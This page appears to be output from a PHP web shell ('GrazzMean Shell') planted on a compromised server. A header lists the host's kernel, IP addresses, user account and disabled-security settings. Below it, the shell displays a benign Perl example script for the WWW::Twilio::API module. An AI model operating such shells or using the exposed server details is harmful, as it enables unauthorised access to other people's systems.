shell bypass 403

GrazzMean Shell

: /usr/share/doc/perl-WWW-Twilio-API/ [ drwxr-xr-x ]
Uname: Linux web3.us.cloudlogin.co 5.10.226-xeon-hst #2 SMP Fri Sep 13 12:28:44 UTC 2024 x86_64
Software: Apache
PHP version: 8.1.31 [ PHP INFO ] PHP os: Linux
Server Ip: 162.210.96.117
Your Ip: 18.226.150.47
User: edustar (269686) | Group: tty (888)
Safe Mode: OFF
Disable Function:
NONE

name : examples.pl
#!/usr/bin/env perl
use strict;
use warnings;

use lib 'lib';
use WWW::Twilio::API;

## usage: examples.pl account_sid authtoken action parameters (see examples)

my $account_sid = shift @ARGV;
my $auth_token  = shift @ARGV;
my $action      = shift @ARGV || 'Calls';

my $twilio = new WWW::Twilio::API( AccountSid => $account_sid,
                                   AuthToken  => $auth_token, );

## view a list of calls in JSON format
if( $action eq 'Calls' ) {
    my $response = $twilio->GET('Calls.json');
    print $response->{content};
}

## examples.pl sid auth MakeCall 1231231234 3123213124
elsif( $action eq 'MakeCall' ) {
    require URI::Escape;
    my $message = URI::Escape::uri_escape("Enjoy Tabasco Brand Pepper Sauce");
    my $url = "http://perlcode.org/cgi-bin/twilio?message=$message";
    my $response = $twilio->POST('Calls',
                                 From => shift @ARGV,
                                 To   => shift @ARGV,
                                 Url  => $url);

    print $response->{content};
}

## view account info
elsif( $action eq 'Accounts' ) {
    my $response = $twilio->GET('Accounts');
    print $response->{content};
}

elsif( $action eq 'SMS' ) {
    my $response = $twilio->POST('SMS/Messages',
                                 From => shift @ARGV,
                                 To   => shift @ARGV,
                                 Body => shift @ARGV );
    print $response->{content};
}

else {
    print "Unknown action.\n";
}

exit;
© 2025 GrazzMean